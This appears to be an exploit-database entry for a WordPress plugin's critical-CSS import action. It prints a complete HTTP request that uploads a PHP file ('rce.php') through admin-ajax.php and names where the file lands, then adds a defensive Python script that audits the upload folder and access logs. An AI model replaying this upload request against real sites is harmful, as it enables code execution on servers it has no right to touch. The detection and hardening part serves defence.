## https://sploitus.com/exploit?id=WPEX-ID:10372
https://drive.google.com/file/d/1siZsDiJsYRCw58Ksram5zBJOVbs-Hio1/view?usp=sharing

POST /wp-admin/admin-ajax.php HTTP/1.1
Host: example.com
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:79.0) Gecko/20100101 Firefox/79.0
Accept: */*
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://example.com/wp-admin/options-general.php?page=ao_critcss
X-Requested-With: XMLHttpRequest
Content-Type: multipart/form-data; boundary=---------------------------161325441624547204062709166080
Content-Length: 504
Connection: close
Cookie: [Admin Cookies]

-----------------------------161325441624547204062709166080
Content-Disposition: form-data; name="file"; filename="rce.php"
Content-Type: application/zip

<?php phpinfo() ?>
-----------------------------161325441624547204062709166080
Content-Disposition: form-data; name="action"

ao_ccss_import
-----------------------------161325441624547204062709166080
Content-Disposition: form-data; name="ao_ccss_import_nonce"

6df2d6b321
-----------------------------161325441624547204062709166080--


Even if the request returns an HTTP 500 error (for example, when the PHP ZipArchive extension is not installed), the uploaded file will be at /wp-content/uploads/ao_ccss/rce.php
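Because the file stays in place even when the import fails, a failed import can still leave a file behind, so the directory should be audited. The following is an added example (not part of the original advisory or the plugin's code) that checks the `ao_ccss` upload directory for files that could run as PHP and scans access-log lines for requests to such files. The function names, the extension list, the combined log format and the sample log lines are assumptions made for illustration.

```python
import re
from pathlib import Path

# Extensions often mapped to the PHP handler (assumption: match to your server config).
PHP_EXT = {".php", ".phtml", ".phar", ".pht", ".php5", ".php7"}
PHP_TAG = re.compile(rb"<\?(php|=)", re.I)
REQ = re.compile(r'"[A-Z]+ (?P<path>\S+) HTTP/[\d.]+" (?P<status>\d{3})')
AO_DIR = "/wp-content/uploads/ao_ccss/"

# Constructed access-log lines (combined log format), not from a real server.
SAMPLE_LOG = [
    '203.0.113.5 - - [01/Jan/2021:10:00:00 +0000] "POST /wp-admin/admin-ajax.php HTTP/1.1" 500 0',
    '203.0.113.5 - - [01/Jan/2021:10:00:02 +0000] "GET /wp-content/uploads/ao_ccss/rce.php HTTP/1.1" 200 512',
    '198.51.100.7 - - [01/Jan/2021:10:01:00 +0000] "GET /wp-content/uploads/ao_ccss/data.json HTTP/1.1" 200 90',
]


def audit_upload_dir(ao_ccss_dir):
    """Return (relative path, reason) pairs for files that could execute as PHP."""
    root = Path(ao_ccss_dir)
    findings = []
    for f in sorted(p for p in root.rglob("*") if p.is_file()):
        # Check every suffix so names like shell.php.txt are caught too.
        if {s.lower() for s in f.suffixes} & PHP_EXT:
            findings.append((str(f.relative_to(root)), "php-extension"))
        elif PHP_TAG.search(f.read_bytes()[:65536]):
            findings.append((str(f.relative_to(root)), "php-open-tag"))
    return findings


def audit_access_log(lines):
    """Return (path, status) for requests to PHP-named files under ao_ccss."""
    hits = []
    for line in lines:
        m = REQ.search(line)
        if not m:
            continue
        path = m["path"].split("?", 1)[0]
        name = path.rsplit("/", 1)[-1].lower()
        if AO_DIR in path and any(name.endswith(e) or e + "." in name for e in PHP_EXT):
            hits.append((path, int(m["status"])))
    return hits


if __name__ == "__main__":
    import sys
    for hit in audit_access_log(SAMPLE_LOG):
        print("log:", hit)
    for finding in audit_upload_dir(sys.argv[1]) if len(sys.argv) > 1 else []:
        print("file:", finding)
```

Pass the path to `wp-content/uploads/ao_ccss` as the first argument to audit the directory on disk; any finding there warrants checking that the plugin is updated and that PHP execution is disabled under the uploads tree.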